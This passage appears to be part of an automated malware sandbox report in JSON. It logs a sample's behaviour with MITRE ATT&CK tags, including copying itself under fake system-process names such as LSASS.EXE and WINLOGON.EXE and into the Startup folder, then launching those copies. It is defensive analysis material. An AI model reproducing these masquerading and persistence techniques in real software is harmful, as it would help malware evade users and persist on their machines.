75910000\n \"LSASS.EXE\" loaded module \"ADVAPI32.DLL\" at base 75da0000\n \"LSASS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75960000\n \"LSASS.EXE\" loaded module \"KERNEL32.DLL\" at base 77680000\n \"LSASS.EXE\" loaded module \"SHELL32.DLL\" at base 76790000\n \"LSASS.EXE\" loaded module \"OLE32.DLL\" at base 75e50000\n \"LSASS.EXE\" loaded module \"COMCTL32.DLL\" at base 74960000\n \"LSASS.EXE\" loaded module \"OLEAUT32.DLL\" at base 75fb0000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77680000\n \"LSASS.EXE\" loaded module \"SETUPAPI.DLL\" at base 76260000\n \"LSASS.EXE\" loaded module \"RPCRT4.DLL\" at base 76650000\n \"LSASS.EXE\" loaded module \"CLBCATQ.DLL\" at base 760b0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 745f0000\n \"LSASS.EXE\" loaded module \"NTMARTA.DLL\" at base 74ed0000\n \"LSASS.EXE\" loaded module \"USER32\" at base 773e0000\n \"LSASS.EXE\" loaded module \"KERNEL32\" at base 77680000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75910000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71010000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"LSASS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d240000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 748d0000\n \"LSASS.EXE\" loaded module \"SXS.DLL\" at base 75970000\n \"LSASS.EXE\" loaded module \"CRYPTSP.DLL\" at base 75470000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75200000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 748d0000\n \"SMSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 75fb0000\n \"SMSS.EXE\" loaded module \"SXS.DLL\" at base 75970000\n \"SMSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 75470000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75200000\n \"SMSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 75da0000\n \"SMSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75960000\n \"SMSS.EXE\" loaded module \"DWMAPI.DLL\" at base 742c0000\n \"SMSS.EXE\" loaded module \"KERNEL32.DLL\" at base 77680000\n \"SMSS.EXE\" loaded module \"SHELL32.DLL\" at base 76790000\n \"SMSS.EXE\" loaded module \"OLE32.DLL\" at base 75e50000\n \"SMSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74960000\n \"SMSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 760b0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 745f0000\n \"SMSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74ed0000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77680000\n \"SMSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 76260000\n \"SMSS.EXE\" loaded module \"RPCRT4.DLL\" at base 76650000\n \"SMSS.EXE\" loaded module \"USER32\" at base 773e0000\n \"SMSS.EXE\" loaded module \"KERNEL32\" at base 77680000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75910000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71010000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d240000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 748d0000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71010000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SMSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d240000\n \"LSASS.EXE\" loaded module \"DWMAPI.DLL\" at base 742c0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d240000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe to new location C:\\4k51k4.exe (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe to new location %WINDIR%\\system32\\MrHelloween.scr (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.pif to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.pif to new location C:\\4k51k4.exe (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.pif to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.pif to new location %WINDIR%\\system32\\MrHelloween.scr (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.pif to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.pif to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.pif to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.pif to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.pif to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.pif to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.pif to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.scr to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.scr to new location C:\\4k51k4.exe (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CopyFileA\" to copy C:\\\\0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.scr to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005284)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateDirectoryA\" with parameter C:\\\\4K51K4 (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\4K51K4 (UID: 00000000-00005284)\n \"4k51k4.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"CreateDirectoryA\" with parameter C:\\\\4K51K4 (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\4K51K4 (UID: 00000000-00005232)\n \"IExplorer.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter C:\\\\4K51K4 (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\4K51K4 (UID: 00000000-00003876)\n \"WINLOGON.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003924)\n \"WINLOGON.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00003924)\n \"CSRSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005184)\n \"SERVICES.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005376)\n \"SERVICES.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005376)\n \"LSASS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005396)\n \"LSASS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005396)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005284)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005232)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00003876)\n \"WINLOGON.EXE\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00003924)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-0", "type": 10, "name": "Loads the visual basic runtime environment", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\msvbvm60.dll\" at 72940000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005284)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005284)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005232)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005232)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003876)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003876)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004088)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004088)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004088)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004088)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004088)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004088)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004088)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004088)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002340)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002340)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002340)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002340)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002340)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002340)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002340)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002340)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 